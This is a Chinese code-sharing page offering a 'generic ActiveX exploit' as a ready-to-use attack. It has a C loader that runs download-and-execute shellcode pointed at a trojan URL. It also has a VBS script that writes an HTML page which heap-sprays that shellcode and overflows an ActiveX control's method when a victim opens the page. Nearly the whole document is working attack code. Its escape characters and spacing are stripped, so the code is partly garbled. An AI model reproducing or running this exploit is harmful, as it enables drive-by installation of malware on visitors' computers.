C++代码

复制代码 代码如下:

#include<stdio.h>

#include<string.h>

unsignedcharshellcode[]=

"xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03"

"xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74"

"x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E"

"x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03"

"xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C"

"x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40"

"x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C"

"x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC"

"x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F"

"xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB"

"x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83"

"xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF"

"xFFxFFx52xFFxD0xE8xD7xFFxFFxFF"

"http://fenggou.net/muma.exe";

intmain()

{

void(*code)();//把ShellCode转换成一个参数为空，返回为空的函数指针，并调用

*(int*)&code=shellcode;

code();

}

vbs代码

复制代码 代码如下:

exeurl=InputBox("Pleaseinputyouwantdown&execurl：","输入","http://jb51.net/muma.exe")

ifexeurl<>""then

code="xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5Ex24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5Cx55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7Cx8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xECx04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6FxFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEBx24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFFxFFxFFx52xFFxD0xE8xD7xFFxFFxFF"&Unicode(exeurl&Chr(00)&Chr(00))

FunctionUnicode(str1)

Dimstr,temp

str=""

Fori=1tolen(str1)

temp=Hex(AscW(Mid(str1,i,1)))

Iflen(temp)<5Thentemp=right("0000"&temp,2)

str=str&"x"&temp

Next

Unicode=str

EndFunction

functionreplaceregex(str)

setregex=newregExp

regex.pattern="x(..)x(..)"

regex.IgnoreCase=true

regex.global=true

matches=regex.replace(str,"%u$2$1")

replaceregex=matches

endFunction

setfso=createObject("scripting.filesystemobject")

iffso.FileExists("jb51.htm")then

fso.deleteFile"jb51.htm",True

endIf

setfileS=fso.opentextfile("jb51.htm",8,true)

fileS.writeline"<html>"

fileS.writeline"<title>Sina</title>"

fileS.writeline"<objectclassid=""clsid:8EF2A07C-6E69-4144-96AA-2247D892A73D""id='target'></object>"

fileS.writeline"<body>"

fileS.writeline"<SCRIPTlanguage=""JavaScript"">"

fileS.writeline"varshellcode=unescape("""&replaceregex(code)&""");"

fileS.writeline"varbigblock=unescape(""%u9090%u9090"");"

fileS.writeline"varheadersize=20;"

fileS.writeline"varslackspace=headersize+shellcode.length;"

fileS.writeline"while(bigblock.length<slackspace)bigblock+=bigblock;"

fileS.writeline"fillblock=bigblock.substring(0,slackspace);"

fileS.writeline"block=bigblock.substring(0,bigblock.length-slackspace);"

fileS.writeline"while(block.length+slackspace<0x40000)block=block+block+fillblock;"

fileS.writeline"memory=newArray();"

fileS.writeline"for(x=0;x<300;x++)memory[x]=block+shellcode;"

fileS.writeline"varbuffer='';"

fileS.writeline"while(buffer.length<218)buffer+='x0ax0ax0ax0a';"

fileS.writeline"target.Method1(buffer);"

fileS.writeline"</script>"

fileS.writeline"</body>"

fileS.writeline"</html>"

files.Close

Setfso=nothing

endif

【ActiveX漏洞通用Exploit vbs修正版】相关文章：

★ 用vbscript实现隐藏任务栏图标的脚本

★ VBS.Runauto脚本病毒分析篇

★ encrypt.vbs 内容加密vbs实现代码

★ 中文姓名笔画计算（VBS脚本版）

★ 利用vbs自动修改ip的代码

★ 提权vbs代码

★ discuz 任意管理员密码漏洞利用工具 vbs代码

★ VBS加密解密源码(UserAccounts.CommonDialog) 脚本之家修正版

★ VBS教程：方法-OpenTextFile 方法

★ 使用vbs下载文件的代码加强版